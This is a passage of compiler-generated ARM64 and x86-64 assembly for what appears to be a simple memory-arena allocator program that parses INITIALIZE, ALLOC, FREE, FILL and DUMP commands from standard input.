add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _FILL ; -- Begin function FILL .p2align 2 _FILL: ; @FILL .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur w1, [x29, #-8] stur w2, [x29, #-12] str wzr, [sp, #12] strb wzr, [sp, #11] b LBB7_1 LBB7_1: ; =>This Loop Header: Depth=1 ; Child Loop BB7_2 Depth 2 ldur w8, [x29, #-4] subs w0, w8, #4 ldur w8, [x29, #-4] subs w1, w8, #1 bl _Length str w0, [sp, #4] ldur w8, [x29, #-4] str w8, [sp, #16] b LBB7_2 LBB7_2: ; Parent Loop BB7_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldur w9, [x29, #-4] ldr w10, [sp, #4] add w9, w9, w10 subs w9, w9, #1 subs w8, w8, w9 cset w8, hi tbnz w8, #0, LBB7_7 b LBB7_3 LBB7_3: ; in Loop: Header=BB7_2 Depth=2 ldur w8, [x29, #-12] adrp x9, _Arena@GOTPAGE ldr x9, [x9, _Arena@GOTPAGEOFF] ldr x9, [x9] ldr w10, [sp, #16] ; kill: def $x10 killed $w10 strb w8, [x9, x10] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] ldr w8, [sp, #12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB7_5 b LBB7_4 LBB7_4: ; in Loop: Header=BB7_1 Depth=1 mov w8, #1 strb w8, [sp, #11] b LBB7_7 LBB7_5: ; in Loop: Header=BB7_2 Depth=2 b LBB7_6 LBB7_6: ; in Loop: Header=BB7_2 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB7_2 LBB7_7: ; in Loop: Header=BB7_1 Depth=1 ldur w8, [x29, #-4] subs w0, w8, #12 ldur w8, [x29, #-4] subs w1, w8, #9 bl _Length add w8, w0, #12 ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ls tbnz w8, #0, LBB7_9 b LBB7_8 LBB7_8: ; in Loop: Header=BB7_1 Depth=1 ldur w8, [x29, #-4] subs w0, w8, #12 ldur w8, [x29, #-4] subs w1, w8, #9 bl _Length add w8, w0, #12 stur w8, [x29, #-4] b LBB7_9 LBB7_9: ; in Loop: Header=BB7_1 Depth=1 b LBB7_10 LBB7_10: ; in Loop: Header=BB7_1 Depth=1 ldrb w8, [sp, #11] ands w8, w8, #0x1 cset w8, eq tbnz w8, #0, LBB7_1 b LBB7_11 LBB7_11: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _parse_command ; -- Begin function parse_command .p2align 2 _parse_command: ; @parse_command .cfi_startproc ; %bb.0: sub sp, sp, #144 .cfi_def_cfa_offset 144 stp x29, x30, [sp, #128] ; 16-byte Folded Spill add x29, sp, #128 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] adrp x8, l_.str.6@PAGE add x8, x8, l_.str.6@PAGEOFF stur x8, [x29, #-16] ldur x0, [x29, #-8] ldur x1, [x29, #-16] bl _strtok stur x0, [x29, #-24] ldur x0, [x29, #-24] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_2 b LBB8_1 LBB8_1: ldur x1, [x29, #-16] mov x0, #0 bl _strtok stur x0, [x29, #-32] ldur x0, [x29, #-32] bl _atoi stur w0, [x29, #-36] ldur w8, [x29, #-36] adrp x9, _N@GOTPAGE ldr x9, [x9, _N@GOTPAGEOFF] str w8, [x9] bl _INITIALIZE b LBB8_17 LBB8_2: ldur x0, [x29, #-24] adrp x1, l_.str.8@PAGE add x1, x1, l_.str.8@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_4 b LBB8_3 LBB8_3: bl _FINALIZE b LBB8_16 LBB8_4: ldur x0, [x29, #-24] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: bl _DUMP b LBB8_15 LBB8_6: ldur x0, [x29, #-24] adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_8 b LBB8_7 LBB8_7: ldur x1, [x29, #-16] mov x0, #0 bl _strtok stur x0, [x29, #-48] ldur x0, [x29, #-48] bl _atoi stur w0, [x29, #-52] ldur w0, [x29, #-52] bl _ALLOC b LBB8_14 LBB8_8: ldur x0, [x29, #-24] adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_10 b LBB8_9 LBB8_9: ldur x1, [x29, #-16] mov x0, #0 bl _strtok str x0, [sp, #64] ldr x0, [sp, #64] bl _atoi str w0, [sp, #60] ldr w0, [sp, #60] bl _FREE b LBB8_13 LBB8_10: ldur x0, [x29, #-24] adrp x1, l_.str.12@PAGE add x1, x1, l_.str.12@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_12 b LBB8_11 LBB8_11: ldur x1, [x29, #-16] mov x0, #0 str x0, [sp] ; 8-byte Folded Spill bl _strtok str x0, [sp, #48] ldr x0, [sp, #48] bl _atoi mov x8, x0 ldr x0, [sp] ; 8-byte Folded Reload str w8, [sp, #44] ldur x1, [x29, #-16] bl _strtok str x0, [sp, #32] ldr x0, [sp, #32] bl _atoi mov x8, x0 ldr x0, [sp] ; 8-byte Folded Reload str w8, [sp, #28] ldur x1, [x29, #-16] bl _strtok str x0, [sp, #16] ldr x0, [sp, #16] bl _atoi str w0, [sp, #12] ldr w0, [sp, #44] ldr w1, [sp, #28] ldr w2, [sp, #12] bl _FILL b LBB8_12 LBB8_12: b LBB8_13 LBB8_13: b LBB8_14 LBB8_14: b LBB8_15 LBB8_15: b LBB8_16 LBB8_16: b LBB8_17 LBB8_17: ldp x29, x30, [sp, #128] ; 16-byte Folded Reload add sp, sp, #144 ret .cfi_endproc ; -- End function .globl _read ; -- Begin function read .p2align 2 _read: ; @read .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 ; kill: def $x8 killed $xzr str xzr, [sp, #16] b LBB9_1 LBB9_1: ; =>This Inner Loop Header: Depth=1 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x2, [x8] add x0, sp, #16 add x1, sp, #8 bl _getline stur x0, [x29, #-8] adds x8, x0, #1 cset w8, eq tbnz w8, #0, LBB9_3 b LBB9_2 LBB9_2: ; in Loop: Header=BB9_1 Depth=1 ldr x8, [sp, #16] mov x9, sp str x8, [x9] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf ldr x0, [sp, #16] bl _parse_command b LBB9_1 LBB9_3: ldr x0, [sp, #16] bl _free ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #8] ; 4-byte Folded Spill stur wzr, [x29, #-4] bl _read ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .comm _N,4,2 ; @N .comm _Arena,8,3 ; @Arena .comm _empty,8,3 ; @empty .comm _START_BLOC,4,2 ; @START_BLOC .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%08X\t" l_.str.1: ; @.str.1 .asciz "%02X " l_.str.2: ; @.str.2 .asciz " " l_.str.3: ; @.str.3 .asciz "\n" .comm _ind_start,4,2 ; @ind_start l_.str.4: ; @.str.4 .asciz "%d\n" .comm _nr_bloc,4,2 ; @nr_bloc l_.str.5: ; @.str.5 .asciz "0\n" l_.str.6: ; @.str.6 .asciz " \n" l_.str.7: ; @.str.7 .asciz "INITIALIZE" l_.str.8: ; @.str.8 .asciz "FINALIZE" l_.str.9: ; @.str.9 .asciz "DUMP" l_.str.10: ; @.str.10 .asciz "ALLOC" l_.str.11: ; @.str.11 .asciz "FREE" l_.str.12: ; @.str.12 .asciz "FILL" l_.str.13: ; @.str.13 .asciz "%s" .comm _ind_start_pred,4,2 ; @ind_start_pred .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _INITIALIZE ## -- Begin function INITIALIZE .p2align 4, 0x90 _INITIALIZE: ## @INITIALIZE .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _N@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, %edi movl $1, %esi callq _calloc movq %rax, %rcx movq _Arena@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _N@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, %edi movl $4, %esi callq _calloc movq %rax, %rcx movq _empty@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _START_BLOC@GOTPCREL(%rip), %rax movl $0, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _FINALIZE ## -- Begin function FINALIZE .p2align 4, 0x90 _FINALIZE: ## @FINALIZE .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _free movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _free popq %rbp retq .cfi_endproc ## -- End function .globl _DUMP ## -- Begin function DUMP .p2align 4, 0x90 _DUMP: ## @DUMP .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq _N@GOTPCREL(%rip), %rax cmpl $0, (%rax) jbe LBB2_2 ## %bb.1: leaq L_.str(%rip), %rdi xorl %esi, %esi movb $0, %al callq _printf LBB2_2: movl $0, -4(%rbp) LBB2_3: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jae LBB2_14 ## %bb.4: ## in Loop: Header=BB2_3 Depth=1 movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rax movl -4(%rbp), %ecx ## kill: def $rcx killed $ecx movzbl (%rax,%rcx), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -4(%rbp), %eax addl $1, %eax andl $7, %eax cmpl $0, %eax jne LBB2_7 ## %bb.5: ## in Loop: Header=BB2_3 Depth=1 movl -4(%rbp), %eax addl $1, %eax andl $15, %eax cmpl $0, %eax je LBB2_7 ## %bb.6: ## in Loop: Header=BB2_3 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf LBB2_7: ## in Loop: Header=BB2_3 Depth=1 movl -4(%rbp), %eax addl $1, %eax andl $15, %eax cmpl $0, %eax jne LBB2_12 ## %bb.8: ## in Loop: Header=BB2_3 Depth=1 cmpl $0, -4(%rbp) je LBB2_12 ## %bb.9: ## in Loop: Header=BB2_3 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl -4(%rbp), %eax addl $1, %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax je LBB2_11 ## %bb.10: ## in Loop: Header=BB2_3 Depth=1 movl -4(%rbp), %esi addl $1, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB2_11: ## in Loop: Header=BB2_3 Depth=1 jmp LBB2_12 LBB2_12: ## in Loop: Header=BB2_3 Depth=1 jmp LBB2_13 LBB2_13: ## in Loop: Header=BB2_3 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB2_3 LBB2_14: movq _N@GOTPCREL(%rip), %rax movl (%rax), %eax andl $15, %eax cmpl $0, %eax je LBB2_16 ## %bb.15: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB2_16: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _write ## -- Begin function write .p2align 4, 0x90 _write: ## @write .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl %edx, -12(%rbp) movl $-1, -20(%rbp) movl -4(%rbp), %eax movl %eax, -16(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -8(%rbp), %eax ja LBB3_4 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) movl -20(%rbp), %eax ## kill: def $rax killed $eax movb -12(%rbp,%rax), %dl movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rax movl -16(%rbp), %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) ## %bb.3: ## in Loop: Header=BB3_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB3_1 LBB3_4: popq %rbp retq .cfi_endproc ## -- End function .globl _ALLOC ## -- Begin function ALLOC .p2align 4, 0x90 _ALLOC: ## @ALLOC .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %eax addl $12, %eax movl %eax, -28(%rbp) movl $0, -12(%rbp) movb $0, -29(%rbp) movl $0, -8(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jae LBB4_11 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -8(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) jne LBB4_6 ## %bb.3: ## in Loop: Header=BB4_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) movl -12(%rbp), %eax cmpl -28(%rbp), %eax jne LBB4_5 ## %bb.4: movb $1, -29(%rbp) jmp LBB4_11 LBB4_5: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_9 LBB4_6: ## in Loop: Header=BB4_1 Depth=1 movl -12(%rbp), %eax cmpl -28(%rbp), %eax jae LBB4_8 ## %bb.7: ## in Loop: Header=BB4_1 Depth=1 movl $0, -12(%rbp) LBB4_8: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_9 LBB4_9: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_10 LBB4_10: ## in Loop: Header=BB4_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB4_1 LBB4_11: testb $1, -29(%rbp) je LBB4_70 ## %bb.12: movl -8(%rbp), %eax movl %eax, -16(%rbp) movl -16(%rbp), %ecx subl -28(%rbp), %ecx addl $1, %ecx movq _ind_start@GOTPCREL(%rip), %rax movl %ecx, (%rax) movl -16(%rbp), %eax movq _START_BLOC@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jb LBB4_14 ## %bb.13: movl -16(%rbp), %eax subl -28(%rbp), %eax addl $1, %eax movq _START_BLOC@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB4_23 LBB4_14: movb $0, -30(%rbp) movl -16(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB4_15: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jae LBB4_20 ## %bb.16: ## in Loop: Header=BB4_15 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) je LBB4_18 ## %bb.17: movb $1, -30(%rbp) jmp LBB4_20 LBB4_18: ## in Loop: Header=BB4_15 Depth=1 jmp LBB4_19 LBB4_19: ## in Loop: Header=BB4_15 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_15 LBB4_20: movb -30(%rbp), %al andb $1, %al movzbl %al, %eax cmpl $1, %eax jne LBB4_22 ## %bb.21: movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $3, %esi movl -20(%rbp), %edx callq _write LBB4_22: movl -16(%rbp), %ecx subl -28(%rbp), %ecx addl $1, %ecx movq _START_BLOC@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi addl $8, %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $11, %esi movl -4(%rbp), %edx callq _write jmp LBB4_65 LBB4_23: movb $1, -30(%rbp) movl -16(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB4_24: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jae LBB4_29 ## %bb.25: ## in Loop: Header=BB4_24 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) je LBB4_27 ## %bb.26: movb $0, -30(%rbp) jmp LBB4_29 LBB4_27: ## in Loop: Header=BB4_24 Depth=1 jmp LBB4_28 LBB4_28: ## in Loop: Header=BB4_24 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_24 LBB4_29: movb -30(%rbp), %al andb $1, %al movzbl %al, %eax cmpl $1, %eax jne LBB4_44 ## %bb.30: movb $0, -30(%rbp) movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %eax subl $1, %eax movl %eax, -20(%rbp) LBB4_31: ## =>This Inner Loop Header: Depth=1 movb -30(%rbp), %al xorb $-1, %al testb $1, %al jne LBB4_32 jmp LBB4_36 LBB4_32: ## in Loop: Header=BB4_31 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) je LBB4_34 ## %bb.33: ## in Loop: Header=BB4_31 Depth=1 movb $1, -30(%rbp) LBB4_34: ## in Loop: Header=BB4_31 Depth=1 jmp LBB4_35 LBB4_35: ## in Loop: Header=BB4_31 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB4_31 LBB4_36: movl -20(%rbp), %eax movl %eax, -24(%rbp) LBB4_37: ## =>This Inner Loop Header: Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movl (%rax,%rcx,4), %eax movq _empty@GOTPCREL(%rip), %rcx movq (%rcx), %rcx movl -24(%rbp), %edx ## kill: def $rdx killed $edx cmpl (%rcx,%rdx,4), %eax jne LBB4_41 ## %bb.38: ## in Loop: Header=BB4_37 Depth=1 cmpl $0, -20(%rbp) jne LBB4_40 ## %bb.39: jmp LBB4_41 LBB4_40: ## in Loop: Header=BB4_37 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB4_37 LBB4_41: movl -20(%rbp), %eax movl %eax, -36(%rbp) cmpl $0, -36(%rbp) je LBB4_43 ## %bb.42: movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) LBB4_43: movl -36(%rbp), %edi movl -36(%rbp), %esi addl $3, %esi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edx callq _write movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi addl $4, %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $7, %esi movl -36(%rbp), %edx callq _write movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi addl $8, %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $11, %esi movl -4(%rbp), %edx callq _write jmp LBB4_64 LBB4_44: movb $0, -30(%rbp) movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %eax subl $1, %eax movl %eax, -20(%rbp) LBB4_45: ## =>This Inner Loop Header: Depth=1 movb -30(%rbp), %al xorb $-1, %al testb $1, %al jne LBB4_46 jmp LBB4_50 LBB4_46: ## in Loop: Header=BB4_45 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) je LBB4_48 ## %bb.47: ## in Loop: Header=BB4_45 Depth=1 movb $1, -30(%rbp) LBB4_48: ## in Loop: Header=BB4_45 Depth=1 jmp LBB4_49 LBB4_49: ## in Loop: Header=BB4_45 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB4_45 LBB4_50: movl -20(%rbp), %eax movl %eax, -24(%rbp) LBB4_51: ## =>This Inner Loop Header: Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movl (%rax,%rcx,4), %eax movq _empty@GOTPCREL(%rip), %rcx movq (%rcx), %rcx movl -24(%rbp), %edx ## kill: def $rdx killed $edx cmpl (%rcx,%rdx,4), %eax jne LBB4_55 ## %bb.52: ## in Loop: Header=BB4_51 Depth=1 cmpl $0, -20(%rbp) jne LBB4_54 ## %bb.53: jmp LBB4_55 LBB4_54: ## in Loop: Header=BB4_51 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) jmp LBB4_51 LBB4_55: movl -20(%rbp), %eax movl %eax, -40(%rbp) cmpl $0, -40(%rbp) je LBB4_57 ## %bb.56: movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) LBB4_57: movl -40(%rbp), %edi movl -40(%rbp), %esi addl $3, %esi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edx callq _write movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi addl $4, %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $7, %esi movl -40(%rbp), %edx callq _write movl -16(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB4_58: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jae LBB4_63 ## %bb.59: ## in Loop: Header=BB4_58 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) je LBB4_61 ## %bb.60: jmp LBB4_63 LBB4_61: ## in Loop: Header=BB4_58 Depth=1 jmp LBB4_62 LBB4_62: ## in Loop: Header=BB4_58 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_58 LBB4_63: movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $3, %esi movl -20(%rbp), %edx callq _write movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edi addl $8, %edi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %esi addl $11, %esi movl -4(%rbp), %edx callq _write movl -20(%rbp), %edi addl $4, %edi movl -20(%rbp), %esi addl $7, %esi movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %edx callq _write LBB4_64: jmp LBB4_65 LBB4_65: movl -16(%rbp), %eax subl -4(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) movl -44(%rbp), %esi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf movq _nr_bloc@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _nr_bloc@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _ind_start@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, -8(%rbp) LBB4_66: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax cmpl -16(%rbp), %eax ja LBB4_69 ## %bb.67: ## in Loop: Header=BB4_66 Depth=1 movq _nr_bloc@GOTPCREL(%rip), %rax movl (%rax), %edx movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -8(%rbp), %ecx ## kill: def $rcx killed $ecx movl %edx, (%rax,%rcx,4) ## %bb.68: ## in Loop: Header=BB4_66 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB4_66 LBB4_69: jmp LBB4_71 LBB4_70: leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf LBB4_71: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function Length LCPI5_0: .quad 0x4030000000000000 ## double 16 .section __TEXT,__text,regular,pure_instructions .globl _Length .p2align 4, 0x90 _Length: ## @Length .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl $0, -16(%rbp) movl $0, -24(%rbp) movl -4(%rbp), %eax movl %eax, -20(%rbp) LBB5_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -8(%rbp), %eax ja LBB5_4 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rax movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movzbl (%rax,%rcx), %eax movl %eax, -12(%rbp) movl -12(%rbp), %eax ## kill: def $rax killed $eax cvtsi2sd %rax, %xmm0 movsd %xmm0, -32(%rbp) ## 8-byte Spill movl -24(%rbp), %eax addl %eax, %eax ## kill: def $rax killed $eax cvtsi2sd %rax, %xmm1 movsd LCPI5_0(%rip), %xmm0 ## xmm0 = mem[0],zero callq _pow movaps %xmm0, %xmm2 movsd -32(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movl -16(%rbp), %eax ## kill: def $rax killed $eax cvtsi2sd %rax, %xmm1 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 cvttsd2si %xmm0, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -16(%rbp) movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) ## %bb.3: ## in Loop: Header=BB5_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_1 LBB5_4: movl -16(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _FREE ## -- Begin function FREE .p2align 4, 0x90 _FREE: ## @FREE .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %edi subl $12, %edi movl -4(%rbp), %esi subl $9, %esi callq _Length movl %eax, -16(%rbp) movl -4(%rbp), %edi subl $8, %edi movl -4(%rbp), %esi subl $5, %esi callq _Length movl %eax, -20(%rbp) movl -4(%rbp), %edi subl $4, %edi movl -4(%rbp), %esi subl $1, %esi callq _Length movl %eax, -24(%rbp) movl -4(%rbp), %eax subl $12, %eax movl %eax, -12(%rbp) movl -4(%rbp), %eax subl $12, %eax movq _START_BLOC@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB6_2 ## %bb.1: movl -16(%rbp), %ecx movq _START_BLOC@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _START_BLOC@GOTPCREL(%rip), %rax movl (%rax), %edi addl $4, %edi movq _START_BLOC@GOTPCREL(%rip), %rax movl (%rax), %esi addl $7, %esi xorl %edx, %edx callq _write jmp LBB6_3 LBB6_2: movl -20(%rbp), %edi movl -20(%rbp), %esi addl $3, %esi movl -16(%rbp), %edx callq _write movl -16(%rbp), %edi addl $4, %edi movl -16(%rbp), %esi addl $7, %esi movl -20(%rbp), %edx callq _write LBB6_3: movl -12(%rbp), %eax movl %eax, -8(%rbp) LBB6_4: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax movl -4(%rbp), %ecx addl -24(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax ja LBB6_7 ## %bb.5: ## in Loop: Header=BB6_4 Depth=1 movq _empty@GOTPCREL(%rip), %rax movq (%rax), %rax movl -8(%rbp), %ecx ## kill: def $rcx killed $ecx movl $0, (%rax,%rcx,4) movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rax movl -8(%rbp), %ecx ## kill: def $rcx killed $ecx movb $0, (%rax,%rcx) ## %bb.6: ## in Loop: Header=BB6_4 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl 